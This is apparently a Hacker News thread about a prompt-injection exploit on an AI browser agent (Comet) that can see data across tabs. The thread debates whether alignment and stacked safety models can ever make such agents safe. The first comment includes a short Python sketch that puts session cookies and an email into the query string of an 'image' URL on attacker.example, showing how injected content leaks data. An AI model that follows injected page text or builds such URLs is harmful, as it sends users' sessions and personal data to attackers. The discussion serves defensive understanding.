
645 points helloplanets | 3 comments
ec109685 ◴[] No.45005397[source]
It’s obviously fundamentally unsafe: Google, OpenAI, and Anthropic haven’t released the same feature, and instead use a locked-down VM with no cookies to browse the web.

An LLM within a browser that can view data across tabs is the ultimate “lethal trifecta”.

Earlier discussion: https://news.ycombinator.com/item?id=44847933

It’s interesting that in Brave’s post describing this exploit, they didn’t reach the fundamental conclusion this is a bad idea: https://brave.com/blog/comet-prompt-injection/

Instead, they believe model alignment, trying to understand when a user is doing a dangerous task, etc., will be enough. The only good mitigation they mention is that the agent should drop privileges, but it’s just as easy to hit an attacker-controlled image URL to leak data as it is to send an email.
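
To make that last point concrete, here's a hypothetical sketch (the domain and data below are made up): an injected page doesn't need email or any other privileged tool to exfiltrate data, because getting the agent to fetch an attacker-chosen URL is itself an outbound channel.

    # Hypothetical sketch: data the agent can see is smuggled out through the URL
    # of an "image" the injected page asks it to load. attacker.example is a
    # made-up domain; the request itself is the leak.
    from urllib.parse import quote

    visible_to_agent = "session=abc123; email=alice@example.com"  # invented example data
    exfil_url = "https://attacker.example/pixel.png?d=" + quote(visible_to_agent)
    print(exfil_url)  # the attacker reads the data back out of their server logs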

replies(7): >>45005444 #>>45005853 #>>45006130 #>>45006210 #>>45006263 #>>45006384 #>>45006571 #
snet0 ◴[] No.45005853[source]
> Instead they believe model alignment, trying to understand when a user is doing a dangerous task, etc. will be enough.

Maybe I have a fundamental misunderstanding, but I feel like model alignment and in-model guardrails are statistical preventions, i.e. you reduce the odds to some number of zeroes preceding the 1. These things should literally never be able to happen, though. It’s a fool’s errand to hope that you'll get a model where no value in the input space maps to <bad thing you really don't want>. Even if you “stack” models, having a safety-check model act on the output of your larger model, you're still just multiplying odds.
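
To put toy numbers on the "multiplying odds" point (both failure rates below are invented, and the independence assumption is exactly what an attacker gets to break):

    # Toy sketch, assuming the main model and a safety-check model fail independently.
    p_main_miss = 1e-4    # hypothetical: main model follows an injected instruction
    p_filter_miss = 1e-3  # hypothetical: safety-check model fails to flag it
    print(p_main_miss * p_filter_miss)  # 1e-07: smaller, but never zero
    # An adversary searches for inputs that fool both models at once, so in
    # practice the failures aren't independent and this product is optimistic.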

replies(5): >>45006201 #>>45006251 #>>45006358 #>>45007218 #>>45007846 #
1. closewith ◴[] No.45007846[source]
All modern computer security is based on improbabilities. Public-key cryptography, hashing, tokens, etc. are all based on being extremely improbable to guess, but not impossible. If an LLM can eventually reach that threshold, it will be good enough.
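
For a sense of scale (taking a standard 128-bit security level as the bar, which is an assumption here):

    # Probability of guessing a random 128-bit key or token in a single try.
    p_guess = 1 / 2**128
    print(f"{p_guess:.2e}")  # ~2.94e-39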
replies(2): >>45018295 #>>45084653 #
2. recursive ◴[] No.45018295[source]
Cryptography's risk profile is modeled against active adversaries. The way probability is being thrown around here is not like that. If you find 1 in a billion in the full training set of data that triggers this behavior, that's not the same as 1 in a billion against an active adversary. In cryptography there are vulnerabilities other than brute force.
3. SAI_Peregrinus ◴[] No.45084653[source]
That threshold would require more than 30 orders of magnitude of improvement, given a 1/100,000,000 current probability of an LLM violating alignment: crypto-grade guessing odds are on the order of 1 in 2^128, about 3 × 10^-39, versus the 10^-8 we're granting the LLM. The current probability is much, much higher than that, but let's cut the LLMs some slack & pretend. Improving by a factor of 10^30 is extremely unlikely.
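
Spelling out that arithmetic (taking 1 in 2^128 as the crypto-grade bar, which is my assumption):

    import math

    p_crypto = 1 / 2**128     # ~2.9e-39: odds of guessing a 128-bit key in one try
    p_llm = 1 / 100_000_000   # 1e-8: the charitable figure above
    print(math.log10(p_llm / p_crypto))  # ~30.5, i.e. the ">30 orders of magnitude" gap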